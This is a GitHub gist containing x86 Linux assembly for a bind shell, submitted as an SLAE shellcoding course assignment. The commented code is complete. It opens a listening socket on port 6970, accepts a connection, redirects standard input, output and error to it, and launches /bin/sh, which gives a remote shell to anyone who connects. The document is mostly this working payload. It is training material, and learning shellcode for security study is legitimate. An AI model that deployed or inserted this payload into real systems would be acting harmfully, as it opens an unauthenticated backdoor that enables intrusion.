Created
May 25, 2017 08:25
-
-
Save michaelnewton/c2b267872e2ce8f7a0cc808db859383f to your computer and use it in GitHub Desktop.
SLAE Assignment #1 - Bind Shell Assembly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Filename: bind.nasm | |
| ; Student ID: SLAE - 895 | |
| ; Purpose: Assignment #1 Bind Shell | |
| global _start | |
| section .text | |
| _start: | |
| ; EXECUTE SYS_SOCKETCALL SYS_SOCKET to create a socket | |
| push 0x66 ; push sys_socketcall syscall = 0x66 | |
| pop eax ; pop sys_socketcall in eax | |
| push 0x1 ; push sys_socket = 0x1 | |
| pop ebx ; pop sys_socket | |
| xor ecx, ecx ; zero out ecx | |
| push ecx ; push IPPROTO = 0 | |
| push ebx ; push SOCK_STREAM = 1 | |
| push 0x2 ; push PF_INET = 2 | |
| mov ecx, esp ; store pointer to args in ecx | |
| int 0x80 ; execute SYS_SOCKET syscall | |
| ; EXECUTE SYS_SOCKETCALL SYS_BIND to bind to a port | |
| ; PORT = 6970 or 0x1b3a | |
| xchg edx, eax ; store sockfd for later in edx | |
| inc ebx ; set ebx to 0x2 for sa_family=AF_INET | |
| push esi ; push ip_addr = 0x0 | |
| push word 0x3a1b ; push port 6970 to stack | |
| push word bx ; push AF_INET leaving ebx with the call to BIND for later | |
| mov ecx, esp ; move pointer to args to ecx | |
| push 0x10 ; addrlen 16 | |
| push ecx ; pointer to struct socketaddr | |
| push edx ; sockfd | |
| mov ecx, esp ; set pointer to args in ecx | |
| mov al, 0x66 ; set the syscall 0x66 | |
| int 0x80 ; execute SYS_BIND syscall | |
| ; EXECUTE SYS_SOCKETCALL SYS_LISTEN to listen for incoming connections | |
| xor eax, eax | |
| mov al, 0x66 ; syscall = 0x66 | |
| mov bl, 0x4 ; int call = 4 | |
| push edi ; push 0 - backlog | |
| push edx ; push sockfd | |
| mov ecx, esp ; set pointer to the args | |
| int 0x80 ; execute SYS_LISTEN syscall | |
| ; EXECUTE SYS_SOCKETCALL SYS_ACCEPT to accept connections on the port | |
| mov al, 0x66 ; accept syscall = 0x66 | |
| inc ebx ; int call = 5 | |
| push edi ; push NULL | |
| push edi ; push 0 | |
| push edx ; push sockfd | |
| mov ecx, esp ; set pointer to the args | |
| int 0x80 ; EXECUTE SYS_ACCEPT syscall | |
| ; EXECUTE SYSCALL DUP2 to redirect stdin(0) stdout(1) & stderr(2) to the socket | |
| ; dup2(4,0), dup2(4,1), dup2(4,2) | |
| ; we create a loop with counter to generate 2,1,0 | |
| ; this serves for pushing the counter for the 2nd argument | |
| xor ecx, ecx ; zero out ecx | |
| mov cl, 0x2 ; start a counter in ecx for the 2nd arg to dup2 | |
| xchg ebx, eax ; set clientfd to ebx for the 1st arg to dup2 | |
| xor eax, eax ; zero ebx | |
| loop: | |
| push 0x3f ; dup2 syscall = 0x3f | |
| pop eax ; pop 0x3f to eax | |
| int 0x80 ; execute dup2 | |
| dec ecx ; decrement counter | |
| jns loop ; run loop again | |
| ; EXECUTE EXECVE SYSCALL TO EXECUTE /BIN/SH | |
| push edi | |
| push 0x68732f2f ; push hs// | |
| push 0x6e69622f ; push nib/ | |
| mov ebx, esp ; location of string on stack | |
| xor ecx, ecx ; put location of string on the stack | |
| xor edx, edx ; zero out edx | |
| mov al, 0x0b ; execve syscall = 0x0b | |
| int 0x80 ; execute execve syscall |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment